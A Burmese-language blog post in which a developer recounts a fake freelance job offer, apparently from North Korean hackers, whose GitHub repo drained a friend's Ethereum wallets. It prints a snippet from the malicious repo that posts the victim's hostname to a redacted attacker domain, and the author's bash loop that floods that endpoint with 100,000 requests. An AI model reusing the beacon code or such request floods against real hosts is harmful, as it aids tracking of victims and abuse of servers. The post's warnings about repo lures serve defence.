အမေရိကန်ဒေါ်လာ လေးသောင်းကျော် ဟက်ခံလိုက်ရတဲ့အတွေ့အကြုံ


ကျနော် FB မှာတင်ထားတာကိုဒီမှာပြန်တင်ထားတာပါ။

မြောက်ကိုရီးယားဟက်ကာတွေကဟက်သွားတာ။ မြန်မာက developer တွေလဲသတိထားနိုင်အောင် မြန်မာလိုရေးပီးပြန်လည်ဝေမျှလိုက်ပါတယ်။

ဖြစ်ပုံကဒီလို…

ကျနော့်အသိက blockchain developer သူ့ရုံးကအခြေအနေမကောင်းတော့ဒီကောင်က freelance လေးဘာလေးရရင်လုပ်မယ်ဆိုပီးလုပ်ထားတာ။

အဲ့အချိန်မှာသူ့ကို email ကနေပီးတော့အလုပ်အပ်ချင်လို့ဆိုပီးဆက်သွယ်လာတာ သူ့ရုံးက release လုပ်ထားတဲ့ feature တခုလိုမျိုးဘဲသူတို့ထဲထည့်ပေးရမှာ budget က 80 K to 180 K USD ရှိတယ်ပြောတယ်။

ကျနော့်အသိကလဲစိတ်ဝင်စားတယ်ဆိုပီးပြောတယ်။ အဲ့ဒါနဲ့ WhatsApp နံပါတ်တောင်းပီးဆက်သွယ်တယ် သူ့ကို GitHub repo invite လုပ်လိုက်တယ်။ တချက်ကြည့်ကြည့်ပေါ့။ သူလဲကြည့်ကြည့်တယ် ကုဒ်တွေလဲကြည့်ကြည့်တယ်အမှန်အကန်ဘဲ လို့ထင်ရတယ်။

အဲ့ဒါနဲ့သူက Repo ကို run ကြည့်လိုက်တယ် error တက်နေတယ်။ hacker ကအဲ့ဒါဆို call ခဏခေါ်ကြမယ်သူကြည့်ပေးမယ်ပြောတယ်။

call ခေါ်လိုက်တယ် error ကတက်နေတုန်းဘဲ။ organize တော့သိပ်မဖြစ်ဘူး ဟိုဘဲပြောတာတွေက ဟိုရောက်ဒီရောက်နဲ့

(အဲ့အချိန်မှာ ကျနော့်သူငယ်ချင်း crypto wallet တွေကအကုန်ပါသွားပီ USD ၄သောင်းကျော်အထက်ရှိတဲ့ Ethereum တွေ သူဝယ်ထားတဲ့အချိန်တုန်းကဆို USD ၅ သောင်းကျော်တန်ဖိုးရှိတယ်)

ကျနော့်သူငယ်ချင်းကပါသွားတာမသိသေးဘူး။ သူကဆက်ပီးတော့စကားတွေပြောနေတာ။ hacker ကသိပ်စကားပြန်မပြောဘူး။ နောက် ၂ ရက်လောက်ကြာတော့ပြန်ဆက်သွယ်လာတယ်။ ပီးတော့ နောက်ထက် blockchain developer တယောက်လောက်ထက်ထည့်ရင်ကောင်းမယ်ပြောတယ်။ ဘာလို့လဲဆိုရင် project timeline ကနဲနဲတိုသွားလို့လို့ပြောတယ်။

ဒါကကျနော့်အသိနဲ့ hacker တဖြတ်…

နောက်တပိုင်းကကျနော့်သူငယ်ချင်းရယ် ကျနော်ရယ် ဟက်ကာရယ်…


ကျနော့်သူငယ်ချင်းက ကျနော့်လာခေါ်တယ်။ ကျနော့်ကို Backend လုပ်။ သူက blockchain လုပ်မယ်ပေါ့။ ပိုက်ဆံကလဲမဆိုးဘူးဘာညာပြောတယ်။ အဲ့ဒါနဲ့ဘယ်လောက်လောက်လဲမေးတော့ ဒေါ်လာ ၁သိန်း လောက်ရမယ်ပြောတယ်။ စိတ်ထဲမှာတော့သူပြောတဲ့ scope နဲ့ဆိုပေးတာနဲနဲများနေတယ်ထင်တယ် ဒါပေမယ့် သူနဲ့ပြောပီးသားဆိုတော့လဲ အေးအေးကောင်းပါတယ်ပေါ့။ ကျနော်ထင်လိုက်တာက client ကလုပ်ခိုင်တာတွေတဖြေးဖြေးများလာတက်လို့နေမယ်ဆိုပီးစဥ်းစားမိတာ (အချိန်ကလဲ ၇ လလောက်လုပ်ကမယ်ပြောတာ လူလိုရင်လဲထက်ခေါ်ပေါ့)။

ကျနော်လဲကိုယ့်အသိကလာပြောတာ သူနဲ့ကိုယ်နဲ့ကလဲအလုပ်လုပ်ဖူးတယ်ဆိုတော့ လုပ်မယ်ဆိုပီးပြောလိုက်တယ်။ ပြောပီးပီးချင်း ကျနော့်သူငယ်ချင်းက WhatsApp group ထဲထက်ထည့်တယ်။

hacker ကကျနော့် Github account တောင်းတယ်။ ကျနော်ပေးလိုက်တယ်။

ကျနော့်ကို repo invite လုပ်ပီးတော့ accept လုပ်ခိုင်းတယ်။ကျနော်လုပ်လိုက်တယ်။ (ကျနော်ကကြတော့ ကျနော့်အသိစီကဆိုတော့ ဟိုကောင်သေချာစစ်စေးပီးလောက်ပီဆိုပီထင်သွားတာ… ဘာလို့လဲဆိုရင် သူငယ်ချင်းကလဲ သူသေချာစကားတွေဘာတွေပြောပီးပီဆိုတာမျိုးပြောတာကိုး)

ကျနော်လဲ Github Repo လဲရကောကုဒ်ကို overview ကြည့်ပီးတော့ စမ်း run ကြည့်လိုက်တယ်။ code က express ကုဒ်ထွေထွေထူးထူးအရမ်းမပါဘူး။

အဲ့မှာကျနော်တို့ကို meeting လုပ်အောင်ဆိုပီးပြောတယ်။ ကျနော်စိတ်ထဲမှာတမျိုးဘဲဆိုပီးခံစားရတယ်။ ချက်ချင်းကြီး meeting ခေါ်မယ်ဆိုတော့… ကုဒ် run နေတာကျနော်ရပ်လိုက်တယ်… ပီးတော့ meeting ကိုအိုကေတယ်လို့ပြောလိုက်တယ်… gmeet ကနေခေါ်ရော… တော်တော်လေး professional မကျဘူး။

ကျနော့်ကိုကုဒ် run ခိုင်းနေတယ် အဲ့ဒါနဲ့ကျနော်လဲနေဦးဒါတွေမလုပ်ခင်မင်းကိုမေးစရာရှိတယ်ဆိုပီးပြောတော့ ရတယ်မေးပါပေါ့ အသံကဂျပန်အသံလိုမျိုးဘဲ။ အရင်ဆုံးကျနော်မေးတာမင်း နာမည်ဘယ်လိုခေါ်လဲမေးတယ်။ အမည်ပြောတယ်။

နောက်မင်းမှာ linkedin ရှိလားမေးတယ် linkedin ပေးတယ် linkedin ကြည့်လိုက်တော့နဲနဲ sup ဘဲ။ ဒါပေမယ့်ကျနော်ကအသိကနေလာတာဆိုတော့အရမ်းကြီးနင်းကန်မေးလို့မဖြစ်ဘူးဆိုပီး… မေးနေတာနဲနဲပြန်လျှော့လိုက်တယ်။

ဒါပေမယ့် professional မကျဘူးဆိုတာတော့သိလိုက်တယ်။

ကျနော်နောက်ထက် laptop တလုံးဖွင့်ပီးတော့ repo ကအဲ့စက်ထဲမှာ run လိုက်တယ်။ စိတ်ကဘာဖြစ်တာလဲမသိဘူး။ လက်ရှိကွန်ပျူတာထဲမှာ မ run ချင်တော့ဘူး

နောက်တလုံးမှာ run ပီးတော့ call ကိုလဲအဲ့တလုံးမှာဘဲ run ပီးတော့ပြလိုက်တယ်။

နောက်သူငယ်ချင်းကိုလဲ this guy is weird ဆိုတာချည်း ကျနော်တို့နှယောက် private message ကနေပို့နေတာ။ သူကလဲပိုက်ဆံလိုနေတယ်ထင်တယ်

တချက်ကြည့်ကြည့်ပါဦး တချက်ကြည့်ကြည့်ပါဦးဆိုပီးပြောနေတာ။

အဲ့ဒါနဲ့ကျနော်နောက် laptop တလုံးကနေပြတော့ ဆရာသမားက ဟိုဘက်စက်နဲ့ပြန် run ကြည့်ပါပြောတယ်။ ကျနော်ဘူသွားတာ… အဲ့ဒါနဲ့ဘာလို့လဲ စက်ချင်းကလဲအတူတူဘဲ ဘာလို့အဲ့ဘက်မှာ run စေချင်ရတာလဲမေးပီးတော့ လက်ရှိကွန်ပျူတာက process ကိုလဲရပ်လိုက်တယ်။

အဲ့ကနေသူ run ခိုင်းတာတွေ မ run တော့ဘဲ ငါတို့ဒီတိုင်းဆက်သွားလို့တော့မဖြစ်ဘူး

contract တွေဘာတွေလိုမယ်ပြော… ပီးရင်မင်းတို့လိုချင်တာဘာတွေလဲ… ဘယ်လို feature တွေလိုချင်တာလဲဆိုတာတွေဆက်တိုက်ကျနော်မေးကော။

အဲ့ကြတော့ဆရာသမားက CTO စီကအဲ့ဒါတွေပြန်ညှိရဦးမယ်ပြောတယ်။

အဲ့ဒါနဲ့ကျနော်လဲအေးအဲ့ဒါဆိုအကုန်ညှိပီးမှငါတို့ကိုပြန်ခေါ်လိုက်လို့ပြောတော့ သူကအဲ့ဒါဆိုမနက်ဖြန်ခေါ်လိုက်မယ်ဆိုပီးလုပ်ကော… အဲ့ဒါနဲ့မနက်ဖြန်ဘယ်အချိန်လဲဘာညာမေးတာပေါ့သိပ်မဖြေနိုင်ဘူး။ မနက်ဖြန်စင်ကာပူည ၉ နာရီလုပ်လိုက်ဆိုပီးပြောတော့သူကအဆင်ပြေတယ်ဆိုပီး meeting end လိုက်ကော။

call ပီးသွားတော့ ကျနော့်ဘော်ဒါကိုပြောတာ မင်းကောင်ကမဟုတ်ဘူးထင်တယ်နော်ဆိုပီးသူကလဲတော်တော်လေးပိုက်ဆံလိုနေလားမသိပါဘူး ငါတို့မနက်ဖြန် meeting တော့ဝင်ကြည့်လိုက်မယ်အဲ့ကြမှအခြေအနေမကောင်းရင်ရပ်လိုက်ကြမယ်ဆိုပီးတော့ ပြောတယ်။

ကျနော့်အမျိုးသမီးကလဲကျနော့်ကိုမေးတယ် ဒီနေ့မှ meeting ဝင်တာကျနော်မေးတာကြမ်းလှချည်လားဆိုပီးပြောတယ်။ ကျနော်လဲအဲ့ကောင်က professional တော်တော်မဆန်တာလို့ပြောပီးရှင်းပြလိုက်သေးတယ်။

ရေသွားချိုးဦးမယ်ဆိုပီးရေချိုးခန်းထဲဝင်ပီး ဖုန်းက BBC Burmese YouTube ဖွင့်နားထောင်ရင်းရေချိုးနေတာ… အဲ့အချိန်မှာကျနော့်သူငယ်ချင်းကကျနော့်စီဖုန်းဆက်တယ်။ SK SK ငါတော့အကုန်ပါသွားပီ hack ခံလိုက်ရပီဆိုပီးတော့။ ကျနော်ကရေချိုးရင်းဆိုတော့ အမျိုးသမီးကိုလှမ်းအော်ပီး ကျနော့်ကွန်ပျူတာတွေအကုန် shutdown လုပ်ခိုင်းလိုက်တယ်။

ရေမြန်မြန်ချိုးပီးတော့ ကျနော့်သူငယ်ချင်းပြန်ခေါ်တော့ ဘရိုငါ wallet တွေအကုန်ပါသွားပီ ETH အဲ့အချိန်ကတန်ဖိုး 40K အထက် သူဝယ်တုန်းက 50K

အကုန်ပါသွားပီဆိုပီးပြောတယ်။

ကျနော့် wallet တွေလဲကျနော်ပြန်စစ်တော့မပါသေးဘူး ဒါပေမယ့်စိတ်ချရအောင်လုပ်သင့်တာတွေလုပ် (port တွေစစ် htop နဲ့ဘာတွေ run နေလဲစစ်) ပီးတော့ သူတို့ကုဒ်ကိုလဲ rm -rf လုပ်။

သူတို့ကုဒ် zip တွေတော့ထားထားတာပေါ့ (ကြည့်ကြည့်ချင်ရင်ပို့ပေးလို့ရတယ်လာပြောပါ)။

ဘယ်အချိန်ကပါသွားလဲဆိုတော့လွန်ခဲ့တဲ့ ၂ ရက်ကသူအဲ့ကောင်တွေဖုန်းခေါ်တဲ့နေ့နောက်နေ့ပါသွားတာ။ ဒါပေမယ့်အဲ့ကောင်တွေကိုတော့ susp ဖြစ်တယ်

ဟုတ်မဟုတ်မသိဘူးလုပ်နေတာ။

ကျနော်ကဘရိုအဲ့ကောင်တွေဖြစ်ဖို့သေချာသလောက်ရှိတယ်ပြောတော့သူ့မိန်းမကပါဘေးကနေသူတို့လုပ်တာဆိုရင်ဘာလို့နင့်ကို နောက်ထက်ဆက်သွယ်လဲဆိုပီးမေးတယ်။ ကျနော့်သူငယ်ချင်းက နောက်ထက်လူလိုချင်လို့ပေါ့ဆိုပီးပြောတာ။ သိပ်တော့လက်မခံချင်သေးဘူး အဲ့ကောင်တွေကြောင့်ဆိုတာကို။ သူတို့ကဆုံးရှုံးလိုက်တဲ့သူတွေဆိုတော့ project လိုချင်နေသေးတာထင်တယ်။ ပိုက်ဆံကလဲမက်လောက်စရာကိုး။

အဲ့အချိန်မှာကျနော့်သူငယ်ချင်းက အဲ့ကောင်တွေဟုတ်လောက်တယ် လွန်ခဲ့တဲ့တရက်လောက်တုန်းကလဲ သူ့အမျိုးသမီးရဲ့ credit card တွေ hack ခံလိုက်ရတယ်ဆိုပီးပြောတယ်။ (အဲ့ပိုက်ဆံတွေတော့ bank တွေကဆိုတော့ပြန်ရတယ်ပြောတယ်)

အဲ့လိုနဲ့ညဘက်လဲအတော်နောက်ကျသွားတယ်။ ဖုန်းချပီး ကျနော်ကကျနော့်ကွန်ပျူတာစစ်စရာရှိတာတွေစစ်ပီးတော့အိပ်သွားတာ။ ကျနော့်သူငယ်ချင်းကသူပါသွားတာဆိုတော့မအိပ်ဘဲနဲ့လိုက်စစ်နေတာ။ ကျနော်မနက် ၁၀ နာရီလောက်မှကွန်ပျူတာရှေ့ထိုင်ဖြစ်တာ။ သူငယ်ချင်းကသူ ရဲတိုင်ထားတယ်ဆိုပီးပြောတယ်။ နောက်သူကုဒ်ထဲမှာ sup ဖြစ်တာတခုတွေ့တယ်ဆိုပီးအောက်ကကုဒ်ကိုပြတယ်။

attacker-domain ဆိုတာ hacker ရဲ့ domain ပေါ့။ (FB ကလက်မခံမှာစိုးလို့ဒီမှာအမှန်မထည့်ထားတာ သိချင်တယ်ဆိုရင်လာမေးလို့ရပါတယ်။)

module.exports.verify = () => {
  try {
    const hostname = os.hostname();
    const verifyMessage = `#[5-Run-C604] [${hostname}]\n${__filename}\n`;
    fetch('attacker-domain/verify-human/5', {
      method: 'POST',
      body: new URLSearchParams({
        text: verifyMessage
      })
    });
  } catch (err) {
  }
};

အဲ့ဒါနဲ့ကျနော် curl ကနေစမ်းခေါ်ကြည့်တာ။ အဲ့ကောင်ကျနော့်ကိုချက်ချင်းဖုန်းခေါ်တာ whatapps ကနေ။ ကြည့်ရတယ်ဒီကောင်ကသူတို့ကို noti ပေးတဲ့ကောင်ထင်တယ်။ မကိုင်လိုက်ဘူး။ ဒါနဲ့စမ်းချင်တာနဲ့ အောက်က bash script ရေးပီး ခေါ်ထားလိုက်တာ

#!/bin/bash
for i in {1..100000}; do
  curl -X POST attacker-domain/verify-human/5 \
    -H 'Content-Type: application/x-www-form-urlencoded' \
    -d "text=#[5-LogIn-C604] Fuck You"
  echo "\n"
done

ဖုန်းတွေဆက်ခေါ်နေသေးတယ်။

code scanner တွေ run… google ရှာနဲ့အားလုံးခြုံကြည့်လိုက်တော့

မြောက်ကိုရီးယားကဆိုတာသေချာသလောက်ဘဲ။ ဒါပေမယ့်ကျနော့်ဘော်ဒါကမယုံကြည်နိုင်သေးဘူး (ကိုယ့်ပိုက်ဆံပါသွားတော့ သိပေမယ့်လဲမယုံချင်တာပြောတာပါ)။ ကျနော်ပြောတာက ကျနော်တို့သူ့ကို project fees 25% တောင်းကြည့်လိုက်လို့ရတယ်ဆိုရင်သူတို့ဟုတ်ချင်မှဟုတ်လိမ့်မယ်လို့။ ဒါပေမယ့်အဲ့ကောင်တွေဖြစ်ဖို့သေချာသလောက်ရှိတယ်လို့ကျနော်ပြောလိုက်တာ။ သူကအဲ့လိုမျိုးပို့လိုက်တယ် ၂၅% ပေးပေါ့အဲ့ဒါဆိုဆက်လုပ်မယ်ဘာဆိုပီးတော့။

hacker စီကဘာမှမလာတော့ဘူး။

ဒီကောင်တွေဆိုတာသေချာသလောက်ဖြစ်နေတာဆိုတော့ သူကမစောင့်နိုင်တော့ဘူး… ဒီတိုင်း direct message ကနေ ငါ့ပိုက်ဆံတွေပြန်ပေးပါ့လားဆိုပီးသွားပြောတာ… ဟိုကဘာတွေလာပြောနေတာလဲကောင်လေးဆိုပီးပြောတယ်။

အဲ့လိုပြောပီးနောက်သိပ်မကြာဘူး… ဟိုဘဲကဟုတ်တယ်သူတို့လုပ်တာဆိုပီးပြောတယ်။ မင်းပိုက်ဆံပြန်ပေးမယ်ငါတို့ကို တခြားစက် တွေမှာသွင်းဖို့မင်းကူပေးဆိုပီးပြောတယ်။ ကျနော့်ဘော်ဒါက သူတို့ပြောတဲ့အတိုင်းမလုပ်ဘဲ ရဲကိုဘဲဆက်ပီး update လုပ်လိုက်တယ်။

ဇာတ်လမ်းကတော့အဲ့ဒါပါဘဲ။

မြန်မာမှာအလုပ်အကိုင်တွေရှားနေတော့ မြန်မာကလူတွေဒါမျိုးတွေ scam/hacker တွေရှိတယ်ဆိုတာသိစေချင်လို့ပါ။ နောက်ပိုင်းမြောက်ကိုရီးယားတွေက linkedin မှာပါ premium ဝယ်ပီးတော့ အလုပ်ရှာတဲ့သူတွေကို target ထားလာတာပါ။ Open to Work လုပ်လိုက်ပီဆိုရင်ဒါမျိုးတွေရဲ့ target ဖြစ်ဖို့အရမ်းများပါတယ်။ ဂရုစိုက်ကြပါ။

Company တွေအနေနှင့်ဆိုရင်လဲ အလုပ်ရှာနေတဲ့သူတွေအဖြစ်ပါသူတို့ကလုပ်လာပီးတော့ company တွေထဲထိဝင်နိုင်အောင်လုပ်နေကြပါတယ်။ အဲ့တော့ကိုယ်အင်တာဗျုးမယ့်သူကိုသေချာလေးဂရုစိုက်ဖို့အကြံပေးချင်ပါတယ်။

Developer တွေအနေနှင့်ဆိုရင်လဲ package တွေကိုအထူးဂရုစိုက်ပီးတော့မှ install လုပ်စေချင်ပါတယ်။ stars တွေအများကြီးရှိတယ် PR တွေအများကြီးရှိတယ်ဆိုတာနှင့်မရပါဘူး။ သူတို့မှာအဲ့လိုမျိုးတွေလုပ်ဖို့လုံလောက်တဲ့လူရှိပါတယ်။

ဒီတခုလုံးမှာ

ကျနော့်သူငယ်ချင်းက အလုပ်လုပ်ချင်နေတာဆိုတော့ သေချာမတွေးလိုက်ဘူး။

ကျနော်ကကြတော့ သူငယ်ချင်းစီကလာတာဆိုပီးတော့ ပေါ့ပေါ့တန်တန်တွေးမိလိုက်တာ။ နောက်တခု code repo တွေ invite လုပ်ပီးစမ်းကြည့်ပါဘာညာဆိုရင် zip download လုပ် scan လုပ်သင့်တာတွေလုပ်ပီးမှဆက် process လုပ်သင့်တယ်။ ဖြစ်နိုင်ရင် isolated vm တွေမှာ run ရင်ပိုကောင်းမယ်။

ကျနော်တော့အခုစာရေးနေစဥ်အတွင်းမှာဘဲ ကျနော့်သူငယ်ချင်းပြောတဲ့ “bro, I really need this money” ဆိုတာဘဲကြားယောင်နေမိပါတယ်…

ကျနော့်သူငယ်ချင်းကို hack သွားတာနှင့်ဆင်တဲ့ case Bored BeaverTail & InvisibleFerret Yacht Club – A Lazarus Lure Pt.2

ကုဒ်တွေ URL တွေနဲနဲ sup ဖြစ်တာနဲ့ ဒီ website မှာစစ်နိုင်ပါတယ်


Leave a Reply

Your email address will not be published. Required fields are marked *